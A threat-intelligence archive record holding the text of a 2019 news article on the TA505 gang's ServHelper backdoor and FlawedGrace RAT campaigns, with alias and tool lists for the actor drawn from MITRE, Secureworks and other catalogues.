{
	"id": "387feb6d-42fd-4c0e-84aa-b6139369b711",
	"created_at": "2026-04-06T00:20:13.803841Z",
	"updated_at": "2026-04-10T03:36:37.003548Z",
	"deleted_at": null,
	"sha1_hash": "ae3c24f39d2f6080a8a518e07dd7c2b195049ee7",
	"title": "TA505 Crime Gang Debuts Brand-New ServHelper Backdoor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 56473,
	"plain_text": "TA505 Crime Gang Debuts Brand-New ServHelper Backdoor\r\nBy Tara Seals\r\nPublished: 2019-01-11 · Archived: 2026-04-02 10:50:54 UTC\r\nThe latest malware from TA505 has been seen targeting banks, retailers and restaurants with two different\r\nversions.\r\nA new backdoor named ServHelper has been spotted in the wild, acting as both a remote desktop agent as well as\r\na downloader for a RAT called FlawedGrace.\r\nAccording to Proofpoint, the prolific cybercriminal gang known as TA505 developed ServHelper, which has two\r\nvariants: one focused on remote desktop functions and a second that primarily functions as a downloader. It’s\r\nnamed after the file names that are associated with the infection; and, a sample from one campaign used command\r\nand control (C2) URIs containing “/rest/serv.php.”\r\nThe primary motive is, as usual, financial: “TA505 appears to be actively targeting banks, retail businesses, and\r\nrestaurants as they distribute these malware families,” said Proofpoint researchers, in a posting this week.\r\nResearchers said that the remote desktop version, a.k.a. the “tunnel” variant, was seen in November spreading via\r\na few thousand spam messages that contained Microsoft Word or Publisher attachments with macros that, when\r\nenabled, download and execute the malware. This version focuses on setting up reverse SSH tunnels to allow the\r\nthreat actor to access the infected host via Remote Desktop Protocol (RDP).\r\n“Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to\r\nhijack legitimate user accounts or their web browser profiles and use them as they see fit,” according to\r\nProofpoint.\r\nClick to expand.\r\nA similar campaign consisting of tens of thousands of email messages surfaced later in November, according to\r\nProofpoint. In addition to financial institutions, this campaign also targeted the retail industry. The messages also\r\ncontained Microsoft Word or Publisher attachments with macros, along with Microsoft Wizard attachments. This\r\ncampaign used the downloader variant of ServHelper, the researchers said. The version is stripped of the tunneling\r\nand hijacking functionality and is used as a basic downloader.\r\nhttps://threatpost.com/ta505-servhelper-malware/140792/\r\nPage 1 of 2\n\nIn December, TA505 mixed it up with another downloader-variant campaign. It targeted retail and financial\r\nservices customers again, but this time used a mixture of Microsoft Word attachments with embedded malicious\r\nmacros; PDF attachments with URLs linking to a fake “Adobe PDF Plugin” webpage (which linked to the\r\nmalware); and direct URLs in the email body linking to a ServHelper executable. It also added a new malware\r\npayload.\r\n“In this campaign, we observed ServHelper download and execute an additional malware that we call\r\nFlawedGrace,” according to Proofpoint. “FlawedGrace is a robust remote access trojan (RAT) that we initially\r\nencountered in November 2017, but have rarely observed since.”\r\nPer the malware’s debug strings, the last significant development of FlawedGrace took place during the end of\r\n2017. The ServHelper campaigns were distributing version 2.0.10 of the malware, which is related to the more\r\nwidely known FlawedAmmy RAT.\r\nIn general, it appears that TA505 is enjoying its new toy: ServHelper is being actively developed.\r\n“New commands and functionality are being added to the malware in almost every new campaign,” Proofpoint\r\nresearchers noted.\r\nTA505, a well-resourced organized cybercrime ring, is known for ongoing malware authoring and development,\r\nwith everything from fully-fledged backdoors to what seems like beta-stage code making appearances in its\r\ncampaigns. In this case, ServHelper is unlikely to be a flash in the pan.\r\n“Threat actor TA505 is both consistent and prolific,” Proofpoint researchers said. “When the group distributes new\r\nmalware, it may be a blip (like Bart ransomware, which was only distributed for one day in 2016) or like Locky\r\nransomware it may become the dominant strain of malware in the wild. We will continue to observe the\r\ndistribution of these three malware variants but, at this time, they do not appear to be one-offs, but rather long-term investments by TA505.”\r\nThey added, that also extends the trend that emerged in 2018, in which threat actors increasingly focused on\r\ndistribution of downloaders, information stealers, RATS and “other malware that can remain resident on victim\r\ndevices for far longer than destructive, smash-and-grab malware like ransomware.”\r\nTo the latter point, it’s worth noting that TA505 was responsible for hundreds of Dridex campaigns beginning in\r\n2014, in addition to the massive Locky campaigns that came later. In all cases, hundreds of millions of malicious\r\nmessages were distributed worldwide.\r\nSource: https://threatpost.com/ta505-servhelper-malware/140792/\r\nhttps://threatpost.com/ta505-servhelper-malware/140792/\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://threatpost.com/ta505-servhelper-malware/140792/"
	],
	"report_names": [
		"140792"
	],
	"threat_actors": [
		{
			"id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59",
			"created_at": "2024-06-19T02:03:08.128175Z",
			"updated_at": "2026-04-10T02:00:03.636663Z",
			"deleted_at": null,
			"main_name": "GOLD TAHOE",
			"aliases": [
				"Cl0P Group Identity",
				"FIN11 ",
				"GRACEFUL SPIDER ",
				"SectorJ04 ",
				"Spandex Tempest ",
				"TA505 "
			],
			"source_name": "Secureworks:GOLD TAHOE",
			"tools": [
				"Clop",
				"Cobalt Strike",
				"FlawedAmmy",
				"Get2",
				"GraceWire",
				"Malichus",
				"SDBbot",
				"ServHelper",
				"TrueBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4",
			"created_at": "2022-10-25T15:50:23.5188Z",
			"updated_at": "2026-04-10T02:00:05.26565Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"TA505",
				"Hive0065",
				"Spandex Tempest",
				"CHIMBORAZO"
			],
			"source_name": "MITRE:TA505",
			"tools": [
				"AdFind",
				"Azorult",
				"FlawedAmmyy",
				"Mimikatz",
				"Dridex",
				"TrickBot",
				"Get2",
				"FlawedGrace",
				"Cobalt Strike",
				"ServHelper",
				"Amadey",
				"SDBbot",
				"PowerSploit"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3",
			"created_at": "2023-01-06T13:46:38.860754Z",
			"updated_at": "2026-04-10T02:00:03.125179Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"SectorJ04",
				"SectorJ04 Group",
				"ATK103",
				"GRACEFUL SPIDER",
				"GOLD TAHOE",
				"Dudear",
				"G0092",
				"Hive0065",
				"CHIMBORAZO",
				"Spandex Tempest"
			],
			"source_name": "MISPGALAXY:TA505",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e447d393-c259-46e2-9932-19be2ba67149",
			"created_at": "2022-10-25T16:07:24.28282Z",
			"updated_at": "2026-04-10T02:00:04.921616Z",
			"deleted_at": null,
			"main_name": "TA505",
			"aliases": [
				"ATK 103",
				"Chimborazo",
				"G0092",
				"Gold Evergreen",
				"Gold Tahoe",
				"Graceful Spider",
				"Hive0065",
				"Operation Tovar",
				"Operation Trident Breach",
				"SectorJ04",
				"Spandex Tempest",
				"TA505",
				"TEMP.Warlock"
			],
			"source_name": "ETDA:TA505",
			"tools": [
				"Amadey",
				"AmmyyRAT",
				"AndroMut",
				"Azer",
				"Bart",
				"Bugat v5",
				"CryptFile2",
				"CryptoLocker",
				"CryptoMix",
				"CryptoShield",
				"Dridex",
				"Dudear",
				"EmailStealer",
				"FRIENDSPEAK",
				"Fake Globe",
				"Fareit",
				"FlawedAmmyy",
				"FlawedGrace",
				"FlowerPippi",
				"GOZ",
				"GameOver Zeus",
				"GazGolder",
				"Gelup",
				"Get2",
				"GetandGo",
				"GlobeImposter",
				"Gorhax",
				"GraceWire",
				"Gussdoor",
				"Jaff",
				"Kasidet",
				"Kegotip",
				"Kneber",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Locky",
				"MINEBRIDGE",
				"MINEBRIDGE RAT",
				"MirrorBlast",
				"Neutrino Bot",
				"Neutrino Exploit Kit",
				"P2P Zeus",
				"Peer-to-Peer Zeus",
				"Philadelphia",
				"Philadephia Ransom",
				"Pony Loader",
				"Rakhni",
				"ReflectiveGnome",
				"Remote Manipulator System",
				"RockLoader",
				"RuRAT",
				"SDBbot",
				"ServHelper",
				"Shifu",
				"Siplog",
				"TeslaGun",
				"TiniMet",
				"TinyMet",
				"Trojan.Zbot",
				"Wsnpoem",
				"Zbot",
				"Zeta",
				"ZeuS",
				"Zeus"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434813,
	"ts_updated_at": 1775792197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ae3c24f39d2f6080a8a518e07dd7c2b195049ee7.pdf",
		"text": "https://archive.orkl.eu/ae3c24f39d2f6080a8a518e07dd7c2b195049ee7.txt",
		"img": "https://archive.orkl.eu/ae3c24f39d2f6080a8a518e07dd7c2b195049ee7.jpg"
	}
}